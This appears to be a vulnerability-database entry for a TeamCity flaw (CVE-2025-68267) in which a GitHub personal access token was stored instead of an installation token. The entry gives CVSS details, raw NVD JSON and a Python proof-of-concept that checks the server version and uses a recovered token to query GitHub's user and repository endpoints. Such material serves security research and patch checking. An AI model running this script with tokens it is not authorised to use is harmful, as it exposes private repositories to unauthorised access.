Security Vulnerability Report
CVE-2025-68267 CVSS 6.5 MEDIUM

CVE-2025-68267

Published: 2025-12-16 16:16:07
Last Modified: 2025-12-18 19:20:12

Description

In JetBrains TeamCity before 2025.11.1, excessive privileges were possible because a GitHub personal access token was stored instead of an installation token.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:* - VULNERABLE
JetBrains TeamCity < 2025.11.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
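# CVE-2025-68267 PoC - JetBrains TeamCity excessive GitHub token privileges
#
# Before 2025.11.1 TeamCity stored a GitHub *personal access token* (bound to a
# user account) where a short-lived GitHub App *installation token* should have
# been used.  This script helps an authorised tester or defender confirm two
# things: (1) whether a TeamCity server advertises a version that predates the
# fix, and (2) whether a token recovered from such a server is user-bound and
# can reach repositories beyond the one the integration needs.
#
# Only the standard library is used, so no third-party packages are required.
import json
import os
import re
import urllib.error
import urllib.request

# First release that ships the fix; anything strictly older is affected.
FIXED_VERSION = (2025, 11, 1)
GITHUB_API = "https://api.github.com"
GITHUB_HEADERS = {
    "Accept": "application/vnd.github+json",
    "X-GitHub-Api-Version": "2022-11-28",
}


def parse_version(version):
    """Return the leading dotted numeric components of a TeamCity version string.

    TeamCity reports versions such as ``"2025.07 (build 190543)"``; only the
    dotted prefix is meaningful, so any build suffix is ignored.

    Args:
        version: Raw text returned by ``/app/rest/server/version``.

    Returns:
        A tuple of ints, or ``None`` when the string has no numeric prefix.
    """
    match = re.match(r"\s*(\d+(?:\.\d+)*)", version or "")
    if match is None:
        return None
    return tuple(int(part) for part in match.group(1).split("."))


def is_vulnerable_version(version):
    """Decide whether *version* predates the 2025.11.1 fix.

    Missing trailing components are treated as 0, so ``"2025.11"`` (that is,
    2025.11.0) is reported as affected; a year/month-only comparison would
    wrongly clear it.  Extra components beyond the third are ignored.

    Returns:
        ``True`` if older than the fix, ``False`` if at/after it, ``None`` if
        the string cannot be parsed.
    """
    parsed = parse_version(version)
    if parsed is None:
        return None
    padded = parsed + (0,) * (len(FIXED_VERSION) - len(parsed))
    return padded[: len(FIXED_VERSION)] < FIXED_VERSION


def _http_get(url, headers=None, timeout=10):
    """Perform a GET and return ``(status_code, body_text)``.

    HTTP error responses are returned rather than raised so callers can report
    the status; connection-level failures propagate as ``OSError`` (which
    ``urllib.error.URLError`` subclasses).
    """
    request = urllib.request.Request(url, headers=headers or {})
    try:
        with urllib.request.urlopen(request, timeout=timeout) as response:
            return response.status, response.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


class TeamCityExcessivePrivilegePoC:
    """Check a TeamCity server's version and the scope of a GitHub token it stored.

    Args:
        teamcity_url: Base URL of the TeamCity server (trailing slash optional).
        vulnerable_token: GitHub token to inspect; it is sent only to
            ``api.github.com`` and is never printed.
        timeout: Per-request timeout in seconds.
    """

    def __init__(self, teamcity_url, vulnerable_token, *, timeout=10):
        self.teamcity_url = teamcity_url.rstrip("/")
        self.token = vulnerable_token
        self.timeout = timeout

    def _github_headers(self):
        """Standard GitHub REST headers plus the bearer token."""
        return {**GITHUB_HEADERS, "Authorization": f"Bearer {self.token}"}

    def check_vulnerability(self):
        """Report whether the server's advertised version predates 2025.11.1.

        Returns:
            ``True`` when the version is older than the fix, ``False``
            otherwise (including when the version cannot be fetched or
            parsed).  The version alone is a heuristic: it says nothing about
            whether a personal access token was actually stored.
        """
        print(f"[*] Checking vulnerability status for {self.teamcity_url}")
        version_url = f"{self.teamcity_url}/app/rest/server/version"
        try:
            status, body = _http_get(version_url, timeout=self.timeout)
        except (OSError, ValueError) as err:
            print(f"[-] Error checking version: {err}")
            return False
        if status != 200:
            print(f"[-] Version endpoint returned HTTP {status}")
            return False
        version = body.strip()
        print(f"[+] TeamCity Version: {version}")
        verdict = is_vulnerable_version(version)
        if verdict is None:
            print("[-] Could not parse version string")
            return False
        if verdict:
            print("[!] Version is potentially vulnerable")
            return True
        print("[+] Version is at or after the fixed release 2025.11.1")
        return False

    def enumerate_github_repos(self):
        """List the repositories the token can see via ``GET /user/repos``.

        Only the first page (100 entries) is fetched.  For a token that should
        be scoped to a single installation, any result here is the
        over-privilege this CVE describes.

        Returns:
            The decoded repository list on success, else ``None``.
        """
        print("\n[*] Attempting to enumerate GitHub repositories...")
        api_url = f"{GITHUB_API}/user/repos?per_page=100"
        try:
            status, body = _http_get(api_url, self._github_headers(), self.timeout)
        except (OSError, ValueError) as err:
            print(f"[-] Error: {err}")
            return None
        if status != 200:
            print(f"[-] Failed to access repos: {status}")
            return None
        try:
            repos = json.loads(body)
        except json.JSONDecodeError as err:
            print(f"[-] Unexpected response body: {err}")
            return None
        print(f"[+] Successfully accessed {len(repos)} repositories")
        print("[!] This demonstrates excessive privilege - should not have access to all these repos")
        # Show a sample only; the full list may itself be sensitive.
        for repo in repos[:5]:
            print(f"  - {repo.get('full_name')} ({repo.get('visibility')})")
        return repos

    def check_token_type(self):
        """Return ``True`` if the token is bound to a user account.

        ``GET /user`` succeeds for user-bound tokens (personal access or OAuth
        tokens); a GitHub App installation token, the kind TeamCity should be
        storing, is normally rejected there.  A 200 therefore indicates the
        over-privileged token type, but does not distinguish classic from
        fine-grained personal access tokens.
        """
        print("\n[*] Analyzing token type...")
        api_url = f"{GITHUB_API}/user"
        try:
            status, body = _http_get(api_url, self._github_headers(), self.timeout)
        except (OSError, ValueError) as err:
            print(f"[-] Error: {err}")
            return False
        if status != 200:
            print(f"[-] /user returned HTTP {status}; token is not user-bound or is invalid")
            return False
        try:
            user_data = json.loads(body)
        except json.JSONDecodeError as err:
            print(f"[-] Unexpected response body: {err}")
            return False
        print(f"[+] Token belongs to user: {user_data.get('login')}")
        print("[!] This is a Personal Access Token (excessive privileges)")
        print("[!] Should be using Installation Token instead")
        return True


def main():
    """Entry point: read configuration from the environment and run the checks."""
    print("=" * 60)
    print("CVE-2025-68267 PoC - JetBrains TeamCity Excessive Privileges")
    print("=" * 60)
    # Secrets belong in the environment, not in source; the defaults are
    # placeholders and must be replaced for an authorised run.
    teamcity_url = os.environ.get("TEAMCITY_URL", "https://teamcity.example.com")
    github_token = os.environ.get("GITHUB_TOKEN", "ghp_EXAMPLE_TOKEN")
    poc = TeamCityExcessivePrivilegePoC(teamcity_url, github_token)
    if poc.check_vulnerability():
        print("\n[!] Target appears to be vulnerable to CVE-2025-68267")
        poc.check_token_type()
        poc.enumerate_github_repos()
    else:
        print("\n[+] Target may not be vulnerable")


if __name__ == "__main__":
    main()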

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68267", "sourceIdentifier": "[email protected]", "published": "2025-12-16T16:16:06.540", "lastModified": "2025-12-18T19:20:12.023", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In JetBrains TeamCity before 2025.11.1 excessive privileges were possible due to storing GitHub personal access token instead of an installation token"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-272"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025.11.1", "matchCriteriaId": "549C8763-44C2-4416-9560-E83255B5C99F"}]}]}], "references": [{"url": "https://www.jetbrains.com/privacy-security/issues-fixed/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}